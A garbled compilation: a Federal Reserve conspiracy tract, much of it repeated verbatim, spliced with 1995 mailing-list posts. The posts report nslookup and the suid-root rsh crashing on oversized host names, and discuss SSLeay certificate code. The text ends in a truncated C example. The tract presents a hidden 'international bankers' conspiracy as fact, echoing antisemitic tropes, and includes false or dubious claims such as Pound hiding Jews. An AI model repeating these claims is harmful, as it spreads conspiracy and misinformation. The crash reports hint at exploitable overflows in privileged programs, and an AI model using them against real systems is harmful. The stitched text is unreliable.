This currency-lender conspiracy ("consPIRACY") is as old as Babylon. Even in America it dates far back before 1913. Actually, 1913 was the year in which the way opened for complete economic conquest of our people. The conspiracy is old enough to America so that the system's agents have been for many years in positions such as newspaper publishers, editors, columnists, church ministers, university presidents, professors, textbook authors, attorneys, accountants, labor union leaders, movie makers, radio and TV commentators, politicians from school board members to U.S. Presidents, and many others. These agents control the information available to our people. They manipulate public opinion, elect who they will locally and nationally, and never expose the crooked currency system.
They promote school bonds, municipal bonds, expensive and detrimental farm programs, "urban renewal," "foreign aid," and many other schemes which will put the people more in debt to the bankers. Thoughtful citizens wonder why billions are spent on one program and billions on another which may duplicate or even nullify it, such as paying some farmers not to raise crops, while at the same time building dams or canals to irrigate more farm land. Crazy or stupid? Neither. The goal is more debt. Thousands of government-sponsored ways to waste "money" are perpetrated continually. Most make no sense, but they are never exposed for what they really are: builders of billions for the bankers and debts for the people.

So-called "economic experts" write syndicated columns in hundreds of newspapers, craftily designed to prevent the people from learning the simple truth about our debt-currency system. Commentators on radio and TV, educators, and politicians blame the people as wasteful, lazy, or spendthrift, and blame the workers and consumers for the increase in debts and the inflation of prices, when they really know that the basic cause is the debt-currency system itself. Our people are drowned in charges and counter-charges designed to confuse them and keep them from understanding the evil currency system that so silently robs the workers, farmers, and business people of the fruit of their labor. And, increasingly, the system is being used to rob us of our rights and freedoms, supposedly guaranteed by the U.S. Constitution.
In his book INVENTING REALITY, Michael Parenti wrote: "Ten business and financial corporations control the three major television and radio networks (NBC, CBS, ABC), 34 subsidiary television stations, 201 cable TV systems, 62 radio stations, 20 record companies, 59 magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book publishers and various motion picture companies like Columbia Pictures and Twentieth Century Fox. Three quarters of the major stockholders of ABC, CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust, Citibank, and Bank of America. The overall pattern is one of increasing concentration of ownership and earnings. According to a 1982 LOS ANGELES TIMES survey, independent daily newspapers are being gobbled up by the chains at the rate of fifty or sixty a year. Ten newspaper chains earn over half of all newspaper revenue in this country. Five media conglomerates share 95 percent of the record and tapes market with Warner and CBS alone controlling 65 percent of the market. Eight Hollywood studios account for 89 percent of U.S. feature film rentals. Three television networks earn over two-thirds of total U.S. television revenues. Seven paperback publishers dominate the mass market for books... While having an abundance of numbers and giving an appearance of diversity, the mass media actually are highly centralized outlets that proffer a remarkably homogenized fare. News services for dailies throughout the entire nation are provided by the Associated Press and United Press International (which may soon merge with AP or go under), The New York Times-Washington Post wire services, and several foreign wire services like Reuters. The ideological viewpoint of these news conduits is pretty much the same, marked by prefabricated standardization of news which is constricting and frightening."

In his book THE MEDIA MONOPOLY, Ben H.
Bagdikian writes: "The power to control information is a major lever in the control of society. Giving citizens a choice in ideas and information is as important as giving them a choice in politics. If a nation has narrowly controlled information it will soon have narrowly controlled politics."

When a few informed and concerned people or organizations who know the truth begin to expose the bankers and their agents, or try to stop any of their mad schemes, the messengers are ridiculed and smeared as "right-wing extremists," "super-patriots," "bigots," "racists," "fascists," or "anti-Semites." Any name is used to discredit them, and to stop other people from listening. Books and articles such as you are now reading are kept out of schools, libraries, and book stores. Some, who are especially vocal in their exposure of the treason committed against our people, are harassed by government agencies such as the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bankruptcy. Sometimes their businesses and homes are violently raided at gunpoint, and their money, currency, equipment, and records confiscated, so it is very difficult, if at all possible, to continue their business. In Chapter One the National Commodity and Barter Association was mentioned as an example of such raids. But the most striking case has been that of Ezra Pound, which is covered below.

Using these methods, the Federal Reserve bankers and their agents have been completely successful in preventing most Americans from learning the things you are reading in this report. However, in spite of their control of information, they realize that more and more citizens are learning the truth. Therefore, to prevent retaliation and armed resistance to their plunder of America, they plan to register all firearms and eventually disarm all citizens. They want to eliminate all guns not in the hands of their government police or army.
Our wise Founding Fathers wrote the Second Amendment to the Constitution so that the people could protect themselves against the government.

Love of life, interest in your freedom, compassion for humanity, concern for your children, and the safety of all you have worked for should make you deeply interested in this, America's greatest problem. Our generation has not suffered under the bankers' yoke as the coming generations will. Usury and taxes will continue to take a larger and larger part of the earnings of the people and put them deeper into the pockets of the bankers and their agents. Increasing "government" regulations will prevent citizen protest and opposition to their control. Is it possible that your grandchildren will own neither car nor home, but will live in "government-owned" apartments and ride to work in "government-owned" buses, and be allowed to keep just enough of their earnings to buy a minimum of food and clothing, while their rulers wallow in luxury? In Asia and Eastern Europe this used to be called communism. In America it is called democracy or capitalism. Horace Greeley stated, "While boasting of our noble deeds, we are careful to conceal the ugly fact that by an iniquitous currency system we have nationalized a system of oppression which, though more refined, is no less cruel than the old system of chattel slavery."

THE CASE OF EZRA POUND

Ezra Pound was a poet, one of America's greatest - if not the greatest. He played a major role in the development of writers and poets such as E.E. Cummings, T.S. Eliot, Robert Frost, Ernest Hemingway, James Joyce, and William Carlos Williams. He also studied politics, economics, banking, and monetary theory. He disapproved of war. During World War II, he hid a number of Jews from the Nazi exterminators; if discovered the penalty would have been death. He broadcast a series of talks on Italian radio aimed at Americans.
He had wanted America to stay out of the war, and he said some uncomplimentary things about President Franklin D. Roosevelt. He also stated some of his political and monetary ideas. He was accused of being a traitor. At the end of the war he was imprisoned in an American concentration camp near Pisa, Italy for six months without trial. Then he was transferred to America where he was declared insane and imprisoned in a mental hospital in Washington D.C. for thirteen years. After which the treason charges, for which he had never stood trial, were dropped, and he was released. He returned to Italy, where he lived until his death in 1972.

The reason he was not tried seems to be that his prosecutors didn't have a case that would hold up in court and/or they were afraid that he would repeat in court what he had said over the radio in Italy. Wendell Muncie, M.D., one of the psychiatrists involved in his "sanity hearing," said that Pound's insanity consisted of three factors: his passion for the U.S. Constitution, his espousal of the Confucian ethic, and his desire for world peace. No formal diagnosis of Pound's supposed "insanity" has been found. His captors in Washington openly admitted that Pound was a political prisoner. A Congressional investigation started in 1957 and completed in 1958 exposed the inadequacy of the case against Pound and led to his release.

Here are some extracts from Pound's radio talks:

. "I think an alliance with Stalin's Russia is rotten." (January 29, 1942)

. "Liberty is not a right but a duty." (March 8, 1942)

. "Sovereignty inheres in the right to issue money. And the American sovereignty belongs by right to the people, and their representatives in Congress have the right to issue money and to determine the value thereof. And 120 million, 120 million suckers have lamentably failed to insist on the observation of this quite decided law.... Now the point at which embezzlement of the nation's funds on the part of her officers becomes treason can probably be decided only by jurists, and not by hand-picked judges who support illegality." (April 9, 1942)

. Quotes read by Pound: 1. "'I believe that banking institutions are more dangerous to our liberties than standing armies.' - Thomas Jefferson. 2. 'I have two great enemies, the southern army in front of me and the financial institutions in the rear. Of the two, the one in the rear is the greatest enemy.' - Abraham Lincoln. 3. 'The money power preys upon the nation in times of peace and conspires against it in times of adversity. It is more despotic than monarchy, more insolent than autocracy, more selfish than bureaucracy; it denounces as public enemies all who question its methods, or throw light upon its crimes.' - William Jennings Bryan." (July 26, 1942)

. Back to Pound's own words: "Wars in old times were made to get slaves. The modern implement of imposing slavery is debt." (March 25, 1943)

. "The phase of the usury system which we are trying to analyze is more or less Patterson's perception that the Bank of England could have benefit of all the interest on all the money that it creates out of nothing.... Now the American citizen can, of course, appeal to his constitution, which states that Congress shall have power to coin money or regulate the value thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30, 1943)

. "That text is known to them that have the patience to read it, possibly one-hundredth of one percent of the denizens. They forget it, all save a few Western states. I think somebody in Dakota once read it. The Constitution." (June 30, 1943)

THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONAL AND ILLEGAL

Although there has never been a court case that challenged the legality of the Federal Reserve System, there was a challenge to the National Recovery Act or NRA, which was ruled unconstitutional. The U.S.
Supreme Court - Schechter Poultry v. U.S., 29 U.S. 495, 55 U.S. 837.842 (1935) - ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITIMATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." By passing the Federal Reserve Act, Congress abdicated and transferred to the Federal Reserve bankers its constitutionally legitimate function of issuing and controlling money. If the Supreme Court ruling on the NRA is applied to the Federal Reserve System, the unconstitutionality and illegality of the Fed becomes obvious.

TELL THE PEOPLE

America will not shake off her illegal banker-controlled dictatorship as long as the people are ignorant of the hidden controllers. International bankers, who control most of the governments of the nations and most sources of information, seem to have us completely in their grasp. They are afraid of only one thing: an awakened citizenry armed with the truth. An ignorant citizen is the banker-government's best "client." An informed citizen is the banker-government's worst nightmare.

Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of Atlanta, Georgia, said: "This is a staggering thought. We are completely dependent on the commercial banks. Someone has to borrow every dollar we have in circulation, cash, or credit. If the banks create ample synthetic money, we are prosperous; if not, we starve. We are absolutely without a permanent money system. When one gets a complete grasp of the picture, the tragic absurdity of our hopeless position is almost incredible, but there it is. It is the most important subject intelligent persons can investigate and reflect upon. It is so important that our present civilization may collapse unless it becomes widely understood and the defect remedied very soon."

PRIVATE BANKING

In California a very private "non-bank" has been operating successfully for fifteen years.
From cort at ecn.purdue.edu Wed Sep 27 23:13:18 1995
From: cort at ecn.purdue.edu (cort)
Date: Wed, 27 Sep 95 23:13:18 PDT
Subject: NIS library code exposure (Unix network exposure)
In-Reply-To: <14539.812260953@ghoti.mcom.com>
Message-ID: <199509280613.BAA21957@en.ecn.purdue.edu>

[....]
> Do you have any daemons that run as root and do networking? Are you
> sure that all of them check the length of the host name before passing
> it to gethostbyname?
[....]

On Linux:
ping [huge host name] works
ftp [huge host name] works
finger [huge host name] works
nslookup [huge host name] ... CRUNCH (Segmentation fault)

From anon-remailer at utopia.hacktic.nl Wed Sep 27 23:14:18 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:14:18 PDT
Subject: No Subject
Message-ID: <199509280613.HAA02274@utopia.hacktic.nl>

that they do. 95% of all "cash" transactions in the U.S. are by check. Checks are thus effectively also currency. The banker creates the so-called "loan" by writing a check or deposit slip, not against actual money, but against your promise to pay back the loan. The only cost to the bank is the paper, ink, and a few dollars in salaries and office costs for each transaction. It is "check-kiting" on an enormous scale! The profits are enormous as shown below.

THE COST TO YOU? PRACTICALLY EVERYTHING

In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen. State and local debts were practically non-existent, and government was small and not oppressive. By 1920, after only six years of the Federal Reserve handling our currency, the federal debt had jumped to $24 billion - $228 per citizen.
The Federal Government began to grow like an invisible cancer in its early stages. By 1968 the federal debt had jumped to $347 billion - $1,717 per citizen. Ten years later, by 1978 it had doubled again to $763 billion - $3,500 per citizen. That is a debt of $17,500 for every family of five in America. Federal debt has been growing faster and faster since. And the Federal Government has become a debilitating cancer rapidly sapping and weakening its victim.

Today in 1992 the federal debt is over $4 trillion. (And they "cook the books" on the low side to come up with that figure - see Chapter Nine.) The $4 trillion national debt amounts to $16,000 per citizen, or $80,000 per family of five. And if that debt were calculated in terms of working or tax-paying families, it would be considerably higher. The Federal Government has become a bloated, out-of-control parasite, a terminal cancer. The economy seems so weak that even after many months of blowing up the currency supply, signs of recovery have to be searched for. The entire system may be on the brink of complete collapse.

The above figures do not include state, municipal, school district, business, or personal debts, which total an additional $3 trillion. Total debt in America is thus over $7 trillion - $28,000 per citizen - $120,000 per family of five. This is more than twice the assessed value of all the land and buildings in America. Effectively all of America has been signed over to the bankers. They can take America and we would still owe them another America! Of course, it is to their advantage not to take actual title to the property, so we will not realize that we really own nothing. Instead they leave us with "ownership" so we will willingly continue to work and pay ever higher tributes to the bankers. What we really have is national bankruptcy.

Let me repeat the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonderful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected."

THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS

To grasp the fact that periodic withdrawal of currency through interest payments to the bankers will inexorably transfer all wealth in the nation to the receivers of interest, imagine yourself in a poker or dice game. Everyone has to buy chips (the medium of exchange) from a "banker" who does not risk chips in the game, but watches the table and every hour reaches in and takes 10% to 15% of all the chips on the table. As the game progresses, the number of chips in the possession of each player will go up and down with his or her "luck." However, the total number of chips available to play the game (carry on business and trade) will decrease steadily, while the "banker's" mountain of chips just grows and grows.

The game will get low on chips, and some players will run out. If they want to continue to play, they must buy or borrow more chips from the "banker." The "banker" will sell (lend) the player more chips only if the player signs a "mortgage" agreeing to give the "banker" some real property (car, home, farm, business, etc.). If the payments should go into default, the banker takes the property. The payments must be made on time, whether the player wins (makes a profit) or not. It is easy to see that no matter how skillfully the players play, eventually the "banker" will end up with all of his chips back. Except for the very best or "luckiest" players, the rest, if they stay in the game long enough, will end up owing to the "banker" their cars, their homes, their farms, their businesses, and perhaps even their watches, rings, and the shirts off their backs!
Sir Josiah Stamp, President of the Bank of England in the 1920s, and the second richest man in Britain at the time, said:

"Banking was conceived in iniquity and was born in sin. The bankers own the earth. Take it away from them but leave them in power to create deposits, and with the flick of the pen they create enough deposits to buy it back again. However, take it away from them, and all the great fortunes like mine will disappear, and they ought to disappear, for this would be a happier and better world to live in. But, if you wish to remain the slaves of bankers and pay the cost of your own slavery, let them continue to create deposits."

Our real-life situation is much worse than any poker game. In a poker game no one is forced to go into debt, and anyone can quit at any time and keep whatever he or she still has. But in real life, even if we borrow little ourselves from the bankers, the local, state, and federal governments borrow billions in our name, squander it, then confiscate our earnings from us and pay it to the bankers with interest. We are forced to play their game, and it seems we can only leave the game by dying. We pay as long as we live, and our children pay after we die. If we cannot pay, the same government sends the police to take our property and give it to the bankers.

The bankers risk nothing (at least, the Federal Reserve bankers) in the game; they just collect their percentage and "win it all." In Las Vegas all the games are "rigged" to pay the house (owner) a percentage. They rake in millions. The Federal Reserve bankers' "game" is similarly rigged, and it pays off in billions.

In recent years bankers have added more "cards" to their game. "Credit" cards are promoted as a convenience and a great boon to trade. Actually, they are ingenious devices by which bankers collect 2% to 5% of every retail sale from the seller and 18% or more interest from buyers. A real stacked deck!
POLITICIANS AND BANKERS IN THE SAME LEAGUE

Democrat, Republican, and Independent voters have wondered why politicians always spend more tax currency than they collect. The reason should now be clear. When you study our "debt-currency" system, you soon realize that the politicians are not the agents of the people. They are the agents of the Federal Reserve Bankers, for whom they plan ways to place the people further in debt.

Let me again quote the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonderful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected."

Article 1, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." But what have our politicians done? In 1913 they traitorously gave the U.S. Treasury to the Federal Reserve bankers - lock, stock, and barrel!

Someone recently asked, "What's the difference between Kindergarten and Congress?" Answer: "One has adult supervision!" Actually, we shouldn't criticize Congress; after all, we have the best Congress money can buy. Chapter Ten examines Congress in more detail.

FEDERAL RESERVE SYSTEM AUDIT

The Federal Reserve has never been audited by the government. In 1975 a bill, H.R. 4316, to require Federal Reserve audits, was introduced in Congress. Due to pressure from the currency-controllers, it was rejected. No audit of the Federal Reserve has ever been done.

MOUNTING DEBTS AND WARS

We, as a people, are now ruled by a "banker-owned system" that has usurped the mantle of government, disguised itself as our legitimate government, and set about to pauperize and control the people.
It is now a centralized, all-powerful apparatus whose main purposes are spending the people's currency, promoting war, and propagandizing to perpetuate itself in power. Our two large political parties (the "Demopublicans" also called "Republicrats") have become its servants, the various departments of government its spending agencies, and the Internal Revenue Service its collection agency.

Unknown to the people, our "banker-owned system" operates in close cooperation with similar apparatuses in other nations, also disguised as "governments." Some, we are told, are friends. Others, we are told, are enemies. "Enemies" are built up through international manipulations and used to frighten the American people into going billions of dollars more into debt to the bankers for "military preparedness," "foreign aid to stop communism," "minority rights," etc. Citizens, deliberately confused by brainwashing propaganda, watch helplessly while our politicians give our food, goods, and gold to banker-controlled alien governments under the guise of "better relations," "easing tensions," or "humanitarian aid."

Our banker-controlled government takes our finest and bravest sons and sends them into foreign wars, where tens of thousands are murdered and hundreds of thousands are crippled. Other thousands are morally corrupted and addicted to drugs. When the "war" is over we have gained nothing, but we are scores of billions more in debt to the bankers - which was the real reason for the war in the first place!

MORE THAN JUST ECONOMIC RAPE

The profits from these massive debts have been used to erect a complete and almost hidden economic and political colossus over our nation. Our "banker-owned system" keeps telling us they are trying to do us good, when in truth they work to harm and injure the people.
These would-be despots know it is easier to control and rob an ignorant, poorly-educated, and confused people than it is an informed population, so they deliberately degrade our educational systems. For the same reason they secretly favor drug use, alcohol, racial conflict, and crime in general. Their "war on drugs," as an example, only produces more drug use and a host of related crimes. Everything which debilitates the minds and bodies of the people is secretly encouraged, as it makes the people less able to oppose them, or even to understand what is being done to them. The system wants mediocre, unthinking, helpless "sheople."

Family, morals, and all that is honorable is being swept away, while our "banker-owned system" builds their new subservient man, the foundation of their "new world order." Our new rulers are trying to change our whole political, social, and racial order, but they will not change the debt-currency economic system by which they rob and rule. Our people have become tenants and "debt-slaves" to the bankers and their agents in the land our fathers conquered. It is conquest through the most gigantic fraud and swindle in the history of humankind.

And we remind you again: The key to their wealth and power over us is their MONOPOLISTIC ability to "create" currency out of nothing and to lend it to us at interest. If Congress had not allowed them to do that, they never would have gained secret control over our nation.

CONTROLLED NEWS AND INFORMATION

This currency-lender conspiracy ("consPIRACY") is as old as Babylon. Even in America it dates far back before 1913. Actually, 1913 was the year in which the way opened for complete economic conquest of our people.
The conspiracy is old enough in America that the system's agents have been for many years in positions such as newspaper publishers, editors, columnists, church ministers, university presidents, professors, textbook authors, attorneys, accountants, labor union leaders, movie makers, radio and TV commentators, politicians from school board members to U.S. Presidents, and many others. These agents control the information available to our people. They manipulate public opinion, elect who they will locally and nationally, and never expose the crooked currency system. They promote school bonds, municipal bonds, expensive and detrimental farm programs, "urban renewal," "foreign aid," and many other schemes which will put the people more in debt to the bankers. Thoughtful citizens wonder why billions are spent on one program and billions on another which may duplicate or even nullify it, such as paying some farmers not to raise crops, while at the same time building dams or canals to irrigate more farm land. Crazy or stupid? Neither. The goal is more debt. Thousands of government-sponsored ways to waste "money" are perpetrated continually. Most make no sense, but they are never exposed for what they really are: builders of billions for the bankers and debts for the people.

So-called "economic experts" write syndicated columns in hundreds of newspapers, craftily designed to prevent the people from learning the simple truth about our debt-currency system. Commentators on radio and TV, educators, and politicians blame the people as wasteful, lazy, or spendthrift, and blame the workers and consumers for the increase in debts and the inflation of prices, when they really know that the basic cause is the debt-currency system itself. Our people are drowned in charges and counter-charges designed to confuse them and keep them from understanding the evil currency system that so silently robs the workers, farmers, and business people of the fruit of their labor.
And, increasingly, the system is being used to rob us of our rights and freedoms, supposedly guaranteed by the U.S. Constitution.

In his book INVENTING REALITY, Michael Parenti wrote:

"Ten business and financial corporations control the three major television and radio networks (NBC, CBS, ABC), 34 subsidiary television stations, 201 cable TV systems, 62 radio stations, 20 record companies, 59 magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book publishers and various motion picture companies like Columbia Pictures and Twentieth Century Fox. Three quarters of the major stockholders of ABC, CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust, Citibank, and Bank of America. The overall pattern is one of increasing concentration of ownership and earnings. According to a 1982 LOS ANGELES TIMES survey, independent daily newspapers are being gobbled up by the chains at the rate of fifty or sixty a year. Ten newspaper chains earn over half of all newspaper revenue in this country. Five media conglomerates share 95 percent of the record and tapes market with Warner and CBS alone controlling 65 percent of the market. Eight Hollywood studios account for 89 percent of U.S. feature film rentals. Three television networks earn over two-thirds of total U.S. television revenues. Seven paperback publishers dominate the mass market for books...

While having an abundance of numbers and giving an appearance of diversity, the mass media actually are highly centralized outlets that proffer a remarkably homogenized fare. News services for dailies throughout the entire nation are provided by the Associated Press and United Press International (which may soon merge with AP or go under), The New York Times-Washington Post wire services, and several foreign wire services like Reuters.
The ideological viewpoint of these news conduits is pretty much the same, marked by prefabricated standardization of news which is constricting and frightening."

In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes:

"The power to control information is a major lever in the control of society. Giving citizens a choice in ideas and information is as important as giving them a choice in politics. If a nation has narrowly controlled information it will soon have narrowly controlled politics."

When a few informed and concerned people or organizations who know the truth begin to expose the bankers and their agents, or try to stop any of their mad schemes, the messengers are ridiculed and smeared as "right-wing extremists," "super-patriots," "bigots," "racists," "fascists," or "antisemites." Any name is used to discredit them, and to stop other people from listening. Books and articles such as you are now reading are kept out of schools, libraries, and book stores.

Some, who are especially vocal in their exposure of the treason committed against our people, are harassed by government agencies such as the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bankruptcy. Sometimes their businesses and homes are violently raided at gunpoint, and their money, currency, equipment, and records confiscated, so it is very difficult, if at all possible, to continue their business. In Chapter One the National Commodity and Barter Association was mentioned as an example of such raids. But the most striking case has been that of Ezra Pound, which is covered below.

Using these methods, the Federal Reserve bankers and their agents have been completely successful in preventing most Americans from learning the things you are reading in this report. However, in spite of their control of information, they realize that more and more citizens are learning the truth.
Therefore, to prevent retaliation and armed resistance to their plunder of America, they plan to register all firearms and eventually disarm all citizens. They want to eliminate all guns not in the hands of their government police or army. Our wise Founding Fathers wrote the Second Amendment to the Constitution so that the people could protect themselves against the government.

Love of life, interest in your freedom, compassion for humanity, concern for your children, and the safety of all you have worked for should make you deeply interested in this, America's greatest problem. Our generation has not suffered under the bankers' yoke as the coming generations will. Usury and taxes will continue to take a larger and larger part of the earnings of the people and put them deeper into the pockets of the bankers and their agents. Increasing "government" regulations will prevent citizen protest and opposition to their control. Is it possible that your grandchildren will own neither car nor home, but will live in "government-owned" apartments and ride to work in "government-owned" buses, and be allowed to keep just enough of their earnings to buy a minimum of food and clothing, while their rulers wallow in luxury? In Asia and Eastern Europe this used to be called communism. In America it is called democracy or capitalism.

Horace Greeley stated, "While boasting of our noble deeds, we are careful to conceal the ugly fact that by an iniquitous currency system we have nationalized a system of oppression which, though more refined, is no less cruel than the old system of chattel slavery."

THE CASE OF EZRA POUND

Ezra Pound was a poet, one of America's greatest - if not the greatest. He played a major role in the development of writers and poets, such as E.E. Cummings, T.S. Eliot, Robert Frost, Ernest Hemingway, James Joyce, and William Carlos Williams. He also studied politics, economics, banking, and monetary theory. He disapproved of war.
During World War II, he hid a number of Jews from the Nazi exterminators; if discovered the penalty would have been death. He broadcast a series of talks on Italian radio aimed at Americans. He had wanted America to stay out of the war, and he said some uncomplimentary things about President Franklin D. Roosevelt. He also stated some of his political and monetary ideas. He was accused of being a traitor. At the end of the war he was imprisoned in an American concentration camp near Pisa, Italy for six months without trial. Then he was transferred to America where he was declared insane and imprisoned in a mental hospital in Washington D.C. for thirteen years, after which the treason charges, for which he had never stood trial, were dropped, and he was released. He returned to Italy, where he lived until his death in 1972.

The reason he was not tried seems to be that his prosecutors didn't have a case that would hold up in court and/or they were afraid that he would repeat in court what he had said over the radio in Italy. Wendell Muncie, M.D., one of the psychiatrists involved in his "sanity hearing," said that Pound's insanity consisted of three factors: his passion for the U.S. Constitution, his espousal of the Confucian ethic, and his desire for world peace. No formal diagnosis of Pound's supposed "insanity" has been found. His captors in Washington openly admitted that Pound was a political prisoner. A Congressional investigation started in 1957 and completed in 1958 exposed the inadequacy of the case against Pound and led to his release.

Here are some extracts from Pound's radio talks:

. "I think an alliance with Stalin's Russia is rotten." (January 29, 1942)

. "Liberty is not a right but a duty." (March 8, 1942)

. "Sovereignty inheres in the right to issue money. And the American sovereignty belongs by right to the people, and their representatives in Congress have the right to issue money and to determine the value thereof.
And 120 million, 120 million suckers have lamentably failed to insist on the observation of this quite decided law.... Now the point at which embezzlement of the nation's funds on the part of her officers becomes treason can probably be decided only by jurists, and not by hand-picked judges who support illegality." (April 9, 1942)

. Quotes read by Pound:
1. "'I believe that banking institutions are more dangerous to our liberties than standing armies.' - Thomas Jefferson.
2. 'I have two great enemies, the southern army in front of me and the financial institutions in the rear. Of the two, the one in the rear is the greatest enemy.' - Abraham Lincoln.
3. 'The money power preys upon the nation in times of peace and conspires against it in times of adversity. It is more despotic than monarchy, more insolent than autocracy, more selfish than bureaucracy; it denounces as public enemies all who question its methods, or throw light upon its crimes.' - William Jennings Bryan." (July 26, 1942)

. Back to Pound's own words: "Wars in old times were made to get slaves. The modern implement of imposing slavery is debt." (March 25, 1943)

. "The phase of the usury system which we are trying to analyze is more or less Patterson's perception that the Bank of England could have benefit of all the interest on all the money that it creates out of nothing.... Now the American citizen can, of course, appeal to his constitution, which states that Congress shall have power to coin money or regulate the value thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30, 1943)

. "That text is known to them that have the patience to read it, possibly one-hundredth of one percent of the denizens. They forget it, all save a few Western states. I think somebody in Dakota once read it. The Constitution."
(June 30, 1943)

THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONAL AND ILLEGAL

Although there has never been a court case that challenged the legality of the Federal Reserve System, there was a challenge to the National Recovery Act or NRA, which was ruled unconstitutional. The U.S. Supreme Court - Schechter Poultry v. U.S., 29 U.S. 495, 55 U.S. 837.842 (1935) - ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITIMATE FUNCTIONS..." Article I, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." By passing the Federal Reserve Act, Congress abdicated and transferred to the Federal Reserve bankers its constitutionally legitimate function of issuing and controlling money. If the Supreme Court ruling on the NRA is applied to the Federal Reserve System, the unconstitutionality and illegality of the Fed becomes obvious.

TELL THE PEOPLE

America will not shake off her illegal banker-controlled dictatorship as long as the people are ignorant of the hidden controllers. International bankers, who control most of the governments of the nations and most sources of information, seem to have us completely in their grasp. They are afraid of only one thing: an awakened citizenry armed with the truth. An ignorant citizen is the banker-government's best "client." An informed citizen is the banker-government's worst nightmare.

Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of Atlanta, Georgia, said:

"This is a staggering thought. We are completely dependent on the commercial banks. Someone has to borrow every dollar we have in circulation, cash, or credit. If the banks create ample synthetic money, we are prosperous; if not, we starve. We are absolutely without a permanent money system. When one gets a complete grasp of the picture, the tragic absurdity of our hopeless position is almost incredible, but there it is.
It is the most important subject intelligent persons can investigate and reflect upon. It is so important that our present civilization may collapse unless it becomes widely understood and the defect remedied very soon."

PRIVATE BANKING

In California a very private "non-bank" has been operating successfully for fifteen years. It caters for accounts in gold or Federal Reserve Notes. It is completely private and doesn't report to anyone. It pays interest on both gold and Federal Reserve Note balances. Ideally, we need to establish a network of private banks throughout the country, and eventually throughout the rest of the world. See Chapter Twelve.

From eay at mincom.oz.au Thu Sep 28 00:04:50 1995
From: eay at mincom.oz.au (Eric Young)
Date: Thu, 28 Sep 95 00:04:50 PDT
Subject: X.509, S/MIME, and evolution of PGP
In-Reply-To: <199509272223.PAA13812@ix7.ix.netcom.com>
Message-ID:

On Wed, 27 Sep 1995, Bill Stewart wrote:
> 6) It's a lot of work - well, yeah, it is. And I'm lazy. Is there enough
> related code in SSLeay to steal to help implement it?

I am cleaning up and documenting the routines right now, but yes, it is possible to implement not only a CA but all the other stuff you mention. I have finished digital envelope routines (ala Sign, Verify, Seal and Open). I have the full functionality of RSAref plus support for about umpteen different ciphers in umpteen different modes (well DES, IDEA and RC4 in a total of 13 different modes; I use structure pointers to specify ciphers so only the ciphers used are linked in and it is also trivial for applications to specify new ciphers to use). Everything needed to implement PEM is there; to do S/MIME I've got to do PKCS-7 but that is just a parsing and packaging problem which I will do (when I get time) for SSL v3.

I'm also about to redo my X509_get_certificate routine so that an application can 'push' 'methods' onto the system used to lookup certificates.
I need to be able to look them up via an alias, subject X509 DN, and via Issuer and ID. If I get time I'll probably put in a demo 'method' that will talk to a socket/host and ask for certificates (probably a simple perl server at the other end). I'm taking the view that if I can put hooks into the library for other people to put in routines to retrieve certificates/CRL's I will not have to do all the work :-). I just have to document everything so other people can have a play :-)

eric
--
Eric Young                 | Signature removed since it was generating
AARNet: eay at mincom.oz.au | more followups than the message contents :-)

From cort at ecn.purdue.edu Thu Sep 28 00:11:51 1995
From: cort at ecn.purdue.edu (cort)
Date: Thu, 28 Sep 95 00:11:51 PDT
Subject: NIS library code exposure (Unix network exposure)
In-Reply-To: <199509280613.BAA21957@en.ecn.purdue.edu>
Message-ID: <199509280711.CAA27138@en.ecn.purdue.edu>

> [....]
>
> > Do you have any daemons that run as root and do networking? Are you
> > sure that all of them check the length of the host name before passing
> > it to gethostbyname?
>
> [....]
>
> On Linux:
> ping [huge host name] works
> ftp [huge host name] works
> finger [huge host name] works
> nslookup [huge host name] ... CRUNCH (Segmentation fault)
>

Ouch.....!

On Linux:
rsh [huge host name] crashes bad... (file system now corrupted)

The above claims for ping, ftp and finger may be dependent on how huge is huge. rsh took a very large number (I'm guessing 10 lines, 800 characters) before crashing. Huge was not this huge for the previous tests.

rsh is usually suid root.

I must quit experimenting now.... and repair my system.

Crypto relevance: little.... some hack relevance, lots of general system/network security relevance

Cort.
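Cort's two posts above report utilities crashing when handed a huge host name, and the question he quotes asks whether every root daemon bounds the name before passing it to gethostbyname(). The following is an added example, not code from either post: a C check that enforces the RFC 1035 limits (63 characters per label, 253 for the whole name) and a wrapper that refuses to call the resolver until the name passes. hostname_check, safe_gethostbyname and check_repeated_x are this example's own names, and the repeated-'x' input is constructed to mirror the experiments described.

```c
/* Added example (not from the posts): bound a host name before it reaches
 * the resolver, which is the check the quoted question asks root daemons
 * to perform before calling gethostbyname(). */
#include <ctype.h>
#include <netdb.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* RFC 1035 limits, assumed here as the policy this wrapper enforces:
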